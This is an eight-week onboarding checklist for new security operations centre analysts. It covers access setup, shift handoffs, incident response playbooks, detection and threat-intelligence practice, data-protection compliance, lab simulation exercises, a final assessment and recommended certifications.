Analyst Training Checklist¶
Purpose: Structured 8-week onboarding program for new SOC analysts. Ensures comprehensive coverage of tools, processes, and procedures before production rotation.
Analyst Name: ____ Start Date: YYYY-MM-DD Mentor: ___ SOC Manager: _____ Target Completion: 8 weeks
Week 1: Environment & Access¶
| # | Task | Resource | Done |
|---|---|---|---|
| 1.1 | Receive laptop, badge, credentials | IT Ops | ☐ |
| 1.2 | Complete security clearance / NDA | HR + Legal | ☐ |
| 1.3 | Access provisioned: SIEM, EDR, SOAR, Ticketing | IAM Team | ☐ |
| 1.4 | Read: System Activation | Self-study | ☐ |
| 1.5 | Read: Data Governance Policy | Self-study | ☐ |
| 1.6 | Read: Change Management (RFC) | Self-study | ☐ |
| 1.7 | Tour: SOC facility, war room, escalation phones | Mentor | ☐ |
✅ Checkpoint: Successfully navigated SIEM Dashboard, can locate alert queue. Mentor Signature: _ Date: _
Week 2: SOC Operations¶
| # | Task | Resource | Done |
|---|---|---|---|
| 2.1 | Read: Shift Handoff Standard | Self-study | ☐ |
| 2.2 | Read: Escalation Matrix | Self-study | ☐ |
| 2.3 | Read: SOC Metrics & KPIs | Self-study | ☐ |
| 2.4 | Read: SOC Communication SOP | Self-study | ☐ |
| 2.5 | Shadow: Observe 2 complete shift handoffs | Shift Lead | ☐ |
| 2.6 | Practice: Complete a shift handover log (mock) | Mentor | ☐ |
✅ Checkpoint: Explain shift handoff process, identify escalation contacts. Mentor Signature: _ Date: _
Week 3: Incident Response Framework¶
| # | Task | Resource | Done |
|---|---|---|---|
| 3.1 | Read: IR Framework (NIST) | Self-study | ☐ |
| 3.2 | Read: Severity Matrix | Self-study | ☐ |
| 3.3 | Read: Incident Classification | Self-study | ☐ |
| 3.4 | Review: Incident Report Template | Self-study | ☐ |
| 3.5 | Shadow: Observe Tier 2 handling a real incident | Tier 2 Analyst | ☐ |
| 3.6 | Study: RACI matrix — know who does what | Self-study | ☐ |
✅ Checkpoint: Explain the 6 IR phases and containment decision criteria for Critical vs High severity. Mentor Signature: _ Date: _
Week 4: Playbooks (Core Set)¶
| # | Task | Resource | Done |
|---|---|---|---|
| 4.1 | Read: PB-01 Phishing | Self-study | ☐ |
| 4.2 | Read: PB-02 Ransomware | Self-study | ☐ |
| 4.3 | Read: PB-03 Malware Infection | Self-study | ☐ |
| 4.4 | Read: PB-04 Account Compromise | Self-study | ☐ |
| 4.5 | Read: PB-05 BEC | Self-study | ☐ |
| 4.6 | Walk-through: Execute phishing playbook on a mock alert | Mentor | ☐ |
| 4.7 | Walk-through: Execute malware playbook on a mock alert | Mentor | ☐ |
✅ Checkpoint: Explain the "Containment" step for Ransomware; demonstrate phishing triage on mock alert. Mentor Signature: _ Date: _
Week 5: Detection & Threat Intelligence¶
| # | Task | Resource | Done |
|---|---|---|---|
| 5.1 | Read: Content Management Lifecycle | Self-study | ☐ |
| 5.2 | Read: Threat Intelligence Lifecycle | Self-study | ☐ |
| 5.3 | Review: Sigma Rules Library (browse 10 rules) | Self-study | ☐ |
| 5.4 | Read: Log Source Matrix | Self-study | ☐ |
| 5.5 | Practice: Write a basic SIEM correlation search | Mentor | ☐ |
| 5.6 | Practice: Enrich an IoC using VirusTotal and URLScan | Mentor | ☐ |
✅ Checkpoint: Explain logic of proc_office_spawn_powershell.yml Sigma rule; demonstrate IoC enrichment.
Mentor Signature: _ Date: _
Week 6: Compliance & Data Handling¶
| # | Task | Resource | Done |
|---|---|---|---|
| 6.1 | Read: PDPA Compliance | Self-study | ☐ |
| 6.2 | Read: Data Handling Protocol | Self-study | ☐ |
| 6.3 | Read: Evidence Handling | Self-study | ☐ |
| 6.4 | Quiz: Data classification — what is PII, what requires notification? | Mentor | ☐ |
✅ Checkpoint: Correctly classify 5 data scenarios by PDPA requirements. Mentor Signature: _ Date: _
Week 7: Simulation & Testing¶
| # | Task | Resource | Done |
|---|---|---|---|
| 7.1 | Read: Simulation Guide | Self-study | ☐ |
| 7.2 | Read: Atomic Test Map | Self-study | ☐ |
| 7.3 | Execute: Atomic Red Team Test (T1059.001 — PowerShell) | Lab | ☐ |
| 7.4 | Execute: Atomic Red Team Test (T1566.001 — Spearphishing) | Lab | ☐ |
| 7.5 | Verify: Confirm SIEM detected both simulations | Lab | ☐ |
| 7.6 | Participate: Tabletop exercise (IR scenario) | SOC Team | ☐ |
✅ Checkpoint: Successfully executed 2 Atomic tests, verified detection in SIEM, participated in tabletop. Mentor Signature: _ Date: _
Week 8: Validation & Graduation¶
| # | Task | Resource | Done |
|---|---|---|---|
| 8.1 | Handle: 5 real alerts independently (with mentor oversight) | Production | ☐ |
| 8.2 | Submit: Mock Incident Report (full lifecycle) | Template | ☐ |
| 8.3 | Complete: Written assessment (30 questions) | SOC Manager | ☐ |
| 8.4 | Complete: Practical assessment (mock triage + escalation) | SOC Manager | ☐ |
| 8.5 | Conduct: 1 shift handoff as incoming lead (supervised) | Shift Lead | ☐ |
✅ Final Assessment:
| Criteria | Score | Pass/Fail |
|---|---|---|
| Written Assessment (≥ 80%) | ____/100 | ☐ |
| Practical Assessment (≥ 80%) | ____/100 | ☐ |
| Mock Incident Report Quality | ____/5 | ☐ |
| Mentor Recommendation | Yes/No | ☐ |
🎓 Final Sign-off: Ready for Production Rotation.
| Role | Name | Signature | Date |
|---|---|---|---|
| Analyst | |||
| Mentor | |||
| SOC Manager |
Recommended Certifications¶
| Certification | Provider | Level | Recommended Timeline |
|---|---|---|---|
| CompTIA Security+ | CompTIA | Entry | Before start |
| CompTIA CySA+ | CompTIA | Intermediate | Within 6 months |
| GIAC GSOC | SANS | Intermediate | Within 1 year |
| SC-200 | Microsoft | Intermediate | Within 6 months |
| BTL1 | Security Blue Team | Entry–Intermediate | Within 6 months |
Related Documents¶
- Analyst Onboarding Path — Detailed onboarding roadmap
- SOC Team Structure — Roles and career paths
- Simulation Guide — Lab exercises
- Incident Report Template — Report format